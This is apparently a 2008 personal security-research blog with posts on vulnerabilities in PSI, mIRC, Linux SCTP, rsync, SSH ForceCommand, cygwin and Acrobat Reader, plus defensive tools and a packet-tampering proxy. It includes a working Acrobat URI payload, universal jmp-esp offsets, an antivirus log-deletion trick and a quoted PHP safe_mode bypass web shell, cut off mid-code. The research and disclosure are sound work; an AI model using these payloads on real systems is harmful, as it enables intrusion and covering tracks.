lunes, diciembre 29, 2008

PSI remote integer overflow

I once scanned myself from internet, and 8010/tcp port was detected.
my PSI jabber file transfer service was exposed to internet.

Then I fuzz this service and found a nice DoS.

A signed integer check lets crash remote PSI's and I think is not possible to overflow the heap, becouse the destination buffer is reallocated to the same amount of bytes to be copied.

I have reported it to the coders, and then they give me the ok to launch the advisory:

advisory
exploit

Be aware with the services you are exposing to internet, and be aware with your client applications (browser, jabber, msn, email client ..)

code has bugs ;)

lunes, diciembre 01, 2008

Ksec - my Linux Defense System

Kernel viruses/rootkits are dificult to detect, but admins change the kernel frequently and the attacker loose the rootkit.

People infect user-space, and pre-root attacks are also in user-space, then a system to log user-space dangerous activities will be very useful.

A year ago I coded a defense system that is now public.
Is simple but useful, I hook open, socketcall, execve and unlink, for example if your "ls" is connecting to internet you will see:

Dec 1 13:44:51 hostname kernel: ls CONNECT(80.33.158.80:1337 fam:2)

If your ls Opening for writting:

Dec 1 13:44:25 pwn3d kernel: ls OPEN(/dev/.shm/.sniff w)

try the Defense System here

viernes, octubre 03, 2008

Mirc 6.34(last) Remote Overflow

When a PRIVMSG arrives, the vulnerable function is called to copy the nickname to a buffer:



let's see the pseudocode of the call: (dest, bytes to copy, src)



Let's see the vulnerable memory zero fill:



ESI is the "bytes to copy", we dont jump becouse is greatter than 10, and then ...
the first rep start to copy 0x00 at [edi++] ecx times (309 times) then we write in other vars and out of the page.

Explotation vector: the nick, well, you must be the server becouse servers dont allow large nicknames. (a privmsg with a 315 bytes nick -> DoS)

martes, julio 15, 2008

gdb seek macros

I have coded some basic but useful gdb macros for searching strings and addresses.

get it here:my .gdbinit

Here is a bzip2 compressed mpeg video: demo

Usage:
with this macros, $base in your gdb by default is 0x08048000

(gdb) gob --> execute step by step until get in a 0x0804**** addr (or other $base)

(gdb) seek $base "hello" --> seek hello from $base to $base+0xffff
$1 = "found:"
$2 = 0x8048480
$3 = "found:"
$4 = 0x8049480
$5 = "found:"
$6 = 0x804a008
^C

(gdb) seekRef $base 0x8048480 --> Seek addreses who point to 0x8048386 address
--> in this case ptrs that point to "hello" address
$7 = "found"
$8 = 0x80485a0
$9 = "found"
$10 = 0x80495a0
^C

(gdb) seekRef $base 0x80485a0 --> let's
(gdb) seekRef $base 0x80495a0
$11 = "found"
$12 = 0x8048386
$13 = "found"
$14 = 0x8049386
^C


NOTE: the macros can be stoped with ^C, they don't stop at first occurrence.
TODO: Identify sections (by now can be done manually with (gdb)main info sect)

miércoles, junio 25, 2008

Erasing or Blocking logs remotelly

Monday I dreamt some new web-hacking techniques, now I only remember one:

If you write in the url an eicar, loveletter or any virus fingerprint, the antivirus blocks or deletes the log files, or also the logfile can be sended to the AV company if you write a suspicious pattern.

ex: http://web.com/index.php?<virus pattern>


What about inserting in BD this patterns? If you register in a web, and submit the pattern in de BD, maybe some BD files will be blocked or deleted by the antivirus.

This also can be a vector to exploit some local AV flaws.

NOTE: only Panda detects eicars that are not at the beginning of the file, must use other patterns.

lunes, junio 16, 2008

Linux remote null pointer derreference (CVE-2007-2876)

The linux netfilter connection tracking new_state() function has a vulnerability exploitable remotelly.

sctp_new();

newconntrack = new_state(IP_CT_DIR_ORIGINAL, SCTP_CONNTRACK_NONE, sch->type);
if (newconntrack == SCTP_CONNTRACK_MAX) {
pr_debug("nf_conntrack_sctp: invalid new deleting.\n");
return 0;
}

Max is not allowed, conntrack_none shouldn't be allowed too.

conntrack->proto.sctp.state = newconntrack;

State will be zero.

sctp_packet() for returning the veredict of the packet, take the state 0:

oldsctpstate = conntrack->proto.sctp.state;
newconntrack = new_state(CTINFO2DIR(ctinfo), oldsctpstate, sch->type);

And then give a null ptr:
nf_ct_refresh_acct(conntrack, ctinfo, skb, *sctp_timeouts[newconntrack]);

becouse sctp_timeouts[SCTP_CONNTRACK_NONE ] is null, it has not a callback:

static unsigned int * sctp_timeouts[]
= { NULL, /* SCTP_CONNTRACK_NONE */
&nf_ct_sctp_timeout_closed, /* SCTP_CONNTRACK_CLOSED */
&nf_ct_sctp_timeout_cookie_wait, /* SCTP_CONNTRACK_COOKIE_WAIT */
&nf_ct_sctp_timeout_cookie_echoed, /* SCTP_CONNTRACK_COOKIE_ECHOED */
&nf_ct_sctp_timeout_established, /* SCTP_CONNTRACK_ESTABLISHED */
&nf_ct_sctp_timeout_shutdown_sent, /* SCTP_CONNTRACK_SHUTDOWN_SENT */
&nf_ct_sctp_timeout_shutdown_recd, /* SCTP_CONNTRACK_SHUTDOWN_RECD */
&nf_ct_sctp_timeout_shutdown_ack_sent /* SCTP_CONNTRACK_SHUTDOWN_ACK_SENT */
}


To exploit this you have to create:
socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)
and set the sockopt SCTP_STATUS to zero.

Becouse of this option is read only, you will need to construct the raw sctp packet :)

The victym must have a SCTP service, and the oops probably doensnt crash the system.

domingo, junio 08, 2008

kernel hacking

[will be translated]
He no he probado todos los kernel debuggers para linux, pero lo mas decente que he encontrado para representar las estructuras es ddd conectado por tap0 al qemu en modo -s.


1. Bajar fuentes del kernel a depurar

En el kernel activaremos la compatibilidad .config
Como que depuraremos ese kernel bajo qemu, podemos tener todas las opciones de debug activadas, princincipalmente estas.

.config
CONFIG_DEBUG_KERNEL=y
CONFIG_DEBUG_BUGVERBOSE=y
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_STACKOVERFLOW=y
CONFIG_DEBUG_PAGEALLOC=y

compilaremos con make

2. Necesitamos generar un image.img con dd, formateamos (por ej ext2) y creamos un subsitema linux por ej con un debian debootstrap :)

la montamos:
modprobe loop
mount image.img img/ -o loop

si no carga el driver loop fijo k lo tienes, buscalo ;)


3. qemu

Tenemos la imagen de disco image.img, el kernel comprimido bzImage y sin comprimir vmlinux
Botamos qemu con la imagen de disco y el bzImage

qemu -boot c -kernel linux-2.6.*.*/arch/i386/boot/bzImage -hda ./image.img -append "root=/dev/hda clock=pit" -s

el -s es el modo kernel debug por el puerto 1234


4. ddd o gdb

ddd tiene la ventaja que podremos dibujar las estructuras.

Arrancamos el ddd con el vmlinux recien compilado. (no sirve bzImage)
ddd vmlinux

(gdb) target remote localhost:1234

vamos a chequearlo:
(gdb) b sys_open
(gdb) c

probamos por ej un simple ls que invocara la syscall open

Ahora con el ddd podremos displayar cualquier estructura por ej:



kernel developer sha0wiki

viernes, mayo 30, 2008

sha0proxy v1 released

I have implemented new features to my multiprotocol proxy, you can get it from:

sha0proxy.pl



Imagine you want to see and interact with the communication between a client and server, with sha0proxy you can take control or automate replacements.

By now only TCP is available.

Samples:

1. I want to see the communication

./sha0proxy.pl 445 fileserver 445 view
./smbclient -L 127.0.0.1

I will see the number of current packet
If the client send to server: >>>>>
If the server send to client: <<<<<
And colorized data:

1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 21 ..............A!
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

...

2. I wish to interfere in trafic flow at runtime


./sha0proxy.pl 445 filserver 445 trap
./smbclient -L 127.0.0.1


1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 24 ...............$
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

where>
what>

I have pressed enter enter, don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 48 86 f7 12 01 02 ........*.H.....
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

where>07a
what>AAAAA\x00

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 41 41 41 41 41 00 ........*.AAAAA.
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....


I have writed at 0x0a1 the AAAAA\x00 value and send the packet changed.
Note that I don't accept \0 nor \x0, (you have to put two hex digit and the x)
Note that sha0proxy show us again the second packet, but witch the changes applied.

3. I wish to make only one change quickly :)

/sha0proxy.pl 445 filserver 445 trap 2 07a 'AAAAA\x00'
./smbclient -L 127.0.0.1

Note that i called sha0 proxy with 3 extra params, the number of packet to modify, offset and value (please use '' in strange params)


1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 24 ...............$
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

where>
what>

Y have pressed enter enter, don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 48 86 f7 12 01 02 ........*.H.....
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

where>
what>

Y have pressed enter enter, don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 41 41 41 41 41 00 ........*.AAAAA.
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

I pressed enter, but in commandline i programed changes at second packet, we can see 07a


4. I wish to make many changes or write an exploit

cat > smbHeapBof
#This is not a real exploit
#but could be ;)
#

03 07a AAAAA\x00

#I can separate with one space or tab
#I can put comments
#I cant use \0 or \x0 the only alowed format is hexa \x00
^C

/sha0proxy.pl 445 filserver 445 trap smbHeapBof
./smbclient -L 127.0.0.1


1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 24 ...............$
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

where>
what>

Y have pressed enter enter, don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 48 86 f7 12 01 02 ........*.H.....
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

where>
what>

Y have pressed enter enter, don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 41 41 41 41 41 00 ........*.AAAAA.
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....


I pressed enter, but in the file have programed changes at second packet, we can see 07a


5. I want to make an exploit file for sha0proxy, but with no interaction, i dont want press enter any time.

No problem, use view mode.

/sha0proxy.pl 445 filserver 445 view file
./smbclient -L 127.0.0.1

6. I have the server and client in my box, cant use the same port for server and sha0proxy :/

you mus use ip aliasing

ifconfig eth0:1 up
ifconfig eth0:1 up

listen the server in ip1 (eth0) and sha0proxy in ip2, the client attack to ip2.


EOF

jueves, abril 24, 2008

Interesting "feature" of AcroRead

Acroread8 is vulnerable to a command execution, is possible at URI tag, to make a local path to the file you want to be executed.
get the exploit
This exploit executes the windows calculator, but it can be modified easily:

00000f30 20 6f 62 6a 0d 3c 3c 2f 55 52 49 28 6d 61 69 6c | obj.<</URI(mail|
00000f40 74 6f 3a 74 65 73 74 25 2e 2e 2f 2e 2e 2f 2e 2e |to:test%../../..|
00000f50 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f |/../../../../../|
00000f60 77 69 6e 64 6f 77 73 2f 73 79 73 74 65 6d 33 32 |windows/system32|
00000f70 2f 63 61 6c 63 2e 65 78 65 22 2e 63 6d 64 29 2f |/calc.exe".cmd)/|
<</URI(mailto:test%../../../../../../../../windows/system32/calc.exe".cmd)/S/URI>>

Conclusion: don't trust in any file given from unknown people :)

lunes, abril 14, 2008

Rsync remote code execution

Rync service with xattr support is vulnerable to a remote code execution in versions between 2.6.9 and 3.0.1
--- a/util.c
+++ b/util.c
@@ -1329,7 +1329,7 @@ void *_new_array(unsigned long num, unsigned int size, int use_calloc)
  return use_calloc ? calloc(num, size) : malloc(num * size);
 }
 
-void *_realloc_array(void *ptr, unsigned int size, unsigned long num)
+void *_realloc_array(void *ptr, unsigned int size, size_t num)
 {
  if (num >= MALLOC_MAX/size)
   return NULL;
@@ -1550,7 +1550,10 @@ void *expand_item_list(item_list *lp, size_t item_size,
    new_size += incr;
   else
    new_size *= 2;
-  new_ptr = realloc_array(lp->items, char, new_size * item_size);
+  if (new_size < lp->malloced)
+   overflow_exit("expand_item_list");
+  /* Using _realloc_array() lets us pass the size, not a type. */
+  new_ptr = _realloc_array(lp->items, item_size, new_size);
   if (verbose >= 4) {
    rprintf(FINFO, "[%s] expand %s to %.0f bytes, did%s move\n",
     who_am_i(), desc, (double)new_size * item_size,


1. size_t


First there is the check if (num >= MALLOC_MAX/size)
num*size has to be less than MALLOC_MAX

Have this check a sign problem?

rsync.h redefines size_t to unsigned int, there is not problem, and xattr patch doesn't change this to a signed one.

There is not sign problem here.

2. new_size < malloced


+ if (new_size < lp->malloced)
Now is not possible use this realloc to reduce the heap variable lp->items!!!

3. supply the fixed size instead of the type char


char should *1 I dont think this was a problem.

- new_ptr = realloc_array(lp->items, char, new_size * item_size);
+ new_ptr = _realloc_array(lp->items, item_size, new_size);

The first will use a macro to do:
_realloc_array (ptr, sizeof(char), new_size*item_size)

rsync.h:#define realloc_array(ptr, type, num) ((type*)_realloc_array((ptr), sizeof(type), (num)))

The second will realloc item_size*new_size

The Problem


Then, the problem seems the reduction of size, that was not controlled and lets overflow the lp->items array.

The Explotation


More details about explotation, soon.

jueves, abril 10, 2008

PokerStars Security

In this video we can see that the code is making a tcp connection to 77.87.178.66 The SSL crypted connection to 445 can be redirected to my sha0proxy.pl

PokerStars communication is secure bescause they check the certificates.






If we patch the call dword ptr DS:[7145C] (connect) to make our fake connection to the evilserver, it will not work because of the certificates validations. But cards can be sended to the evil-host. The trojanized client can be distributed to the users.

Conclusion: The software always must be downloaded from an official font by a clear url.

miércoles, abril 09, 2008

Plan9 Security

Plan9 is a new concept of operative system, I like it but I am not confident about its security.

- It saves all the passwords used to connect to remote services in the cache

- There are grids open, maybe are vulnerable a some kind of worms, or can be use as DDoS platforms.

- When you introduce the password to log-in to remote file-server, is viewed in plaint-ext at the screen.

- plan9 services are vulnerable to a stack attacks.

plan9 Security
plan9 Shellcode
plan9 scheduler
pegassus, plan9 webserver
acid, plan9 debugger

I have recorded a video introducing the acid debugger usage.



lunes, abril 07, 2008

SSH ForceCommand security flaw

ForceCommand is a sshd_config option that lets use the remote ssh to execute a restricted commands, for example vi somefile.

When a SSH session is started the ~/.ssh/rc shell script is executed, the user logged by ssh, has permissions to write into his own rc.

Then if we are allowed to make a vi somefile, we can write into ~/.ssh/rc and write a /bin/bash that will be spawned the next time we enter to the system.

The patch only lets the rc execution when ForceCommand is not enabled (options.adm_forced_command == NULL)


+++ usr.bin/ssh/session.c 27 Mar 2008 10:54:55 -0000
@@ -878,8 +878,9 @@
do_xauth =
s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL;

- /* ignore _PATH_SSH_USER_RC for subsystems */
- if (!s->is_subsystem && (stat(_PATH_SSH_USER_RC, &st) >= 0)) {
+ /* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */
+ if (!s->is_subsystem && options.adm_forced_command == NULL &&
+ (stat(_PATH_SSH_USER_RC, &st) >= 0)) {
snprintf(cmd, sizeof cmd, "%s -c '%s %s'",
shell, _PATH_BSHELL, _PATH_SSH_USER_RC);
if (debug_flag)

miércoles, marzo 19, 2008

cygwin security

On November 2007 I have reported to cygwin developers a very important security flaw at cygwin subsistem, that can be exploited remotelly via SSH, HTTP, or almost any kind of daemon runing under cygwin.

jolmos cygwin Advisory

vade79/v9 has released a nice exploit for webdespoxy software, with cygwin the explotation is more efective because all cygwin processes have linked the cygwin1.dll kernel, then we have some universal offsets like:

0x61048690 push esp - ret
0x6104936D jmp esp
0x6112C494 push esp - ret

I don't recomend to use cygwin to opening services to the net.

jueves, febrero 28, 2008

Opera Blogs antiautomatization system

Today I have reported to opera.com that they are using a weak/useless anti-automatization-system, well we can make a simple bot that creates hundreds of blogs :)

Look their anti-automatization "captcha":

http://my.opera.com/community/signup/


well, text security code so easy to collect.
More info at:
http://www.captcha.net/

cya.

miércoles, febrero 27, 2008

How to make a sandbox

A real sandbox should be a loadable kernel module, but we can easilly make one at user space by coding a lib in order to be preloaded after every execution.

gcc -fPIC sandwich.c -o sandwich.so -shared
export LD_PRELOAD=`pwd`/sandwich.so

now connect() and sento() are hooked, then we can exec our "unsafe" programs,
if they try to connect will be intercepted.

Well, this can be bypassed by calling directly the syscall or using not implemented functions.

// $ gcc -fPIC sandwich.c -o sandwich.so -shared
#define RTLD_NEXT ((void *) -1l)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
//Real Calls
static int (*realConnect)(int sockfd,
const struct sockaddr *serv_addr,
socklen_t addrlen);
ssize_t (*realSendto)(int s,
const void *msg,
size_t len,
int flags,
const struct sockaddr *to,
socklen_t tolen);
//Hooked Calls
int connect(int sockfd,
const struct sockaddr *serv_addr,
socklen_t addrlen);
ssize_t sendto(int s,
const void *msg,
size_t len,
int flags,
const struct sockaddr *to,
socklen_t tolen);

int connect(int sockfd,
const struct sockaddr *serv_addr,
socklen_t addrlen) {
int opt;
struct sockaddr_in *s = (struct sockaddr_in *)serv_addr;

printf("Can I connect to %s:%d (Y/N)?",
inet_ntoa(s->sin_addr),s->sin_port);
opt = getchar();
if (opt=='S' || opt=='s' || opt=='y' || opt=='Y') {
realConnect = dlsym(RTLD_NEXT, "connect");
return realConnect(sockfd,serv_addr,addrlen);

} else {
printf("Cancelled ;)\n");
return -1;
}
}

ssize_t sendto(int s,
const void *msg,
size_t len,
int flags,
const struct sockaddr *to,
socklen_t tolen) {
int opt;
struct sockaddr_in *ss = (struct sockaddr_in *)to;

printf("Can I connect to %s:%d (Y/N)?",inet_ntoa(ss->sin_addr),ss->sin_port);
opt = getchar();
if (opt=='S' || opt=='s' || opt=='y' || opt=='Y') {
realSendto = dlsym(RTLD_NEXT, "sendto");
return realSendto(s,msg,len,flags,to,tolen);

} else {
printf("Cancelled ;)\n");
return -1;
}
}

martes, febrero 26, 2008

PHP SafeMode bypass (CVE-2007-3378)

Every week a new way to bypass php-safemode is released, it seemed funny, but this open_basedir Bypass is Scandalous.

If you try to exec some restricted call, safemode will stop-it.
Other way is to use php_value directive of .htaccess files (if httpd.conf is configured to allow httaccess)

So, you can break the safemode restrictions by adding php_value orders like that:

php_value include_path "some"
php_flag display_errors On
php_value upload_max_filesize 200M

for example:

echo php_value session.save_path /inne > .htaccess
session_start();

Exploit code:

# SecurityReason
# Coded by Maksymilian Arciemowicz
# (C) Copyright SecurityReason
# Affected Software : PHP 5.2.3 and prior
# Usage :
# ?cxib=dhr - Delete Delete .htaccess and result.txt
# ?sh=[our_command] - Execute the command
#
#variables
$htaccess="./.htaccess";
#variables
if(@mail("", "", "")==FALSE){
die("mail() function isn't active.");
}
if(!is_writable("./")){
die("This directory isn't writable.");
}
if($_GET['cxib']=="dhr"){
@unlink("./.htaccess");
@unlink("./result.txt");
}
$usun="";
if(file_exists("./result.txt") AND
file_exists("./.htaccess")){
$usun .= "<p><a
href=\"http://".$_SERVER["HTTP_HOST"].
$_SERVER["SCRIPT_NAME"]."?cxib=dhr\">Delet
e .htaccess and result.txt</a>";
}
$htmlstart="<HTML>
<HEAD>
<TITLE>SecurityReason Exploit - PHP 5.2.3 and
prior</TITLE>
</HEAD>
<BODY>";
$formtxt="<center><h1>Security<b><font
color=RED>R</font>eason</b></h1><p>Exp
loit for PHP 5.2.3 and
prior</p><B><CENTER><FONT
COLOR=\"RED\">C</FONT>oded by
<b>Maksymilian Arciemowicz</b>
".$usun."
<p>Form:<br>
<form
action=\"http://".$_SERVER["HTTP_HOST"].$_SER
VER["SCRIPT_NAME"]."\"
name=\"Form\" method=\"POST\">
sh# <input type=\"text\" name=\"sh\"
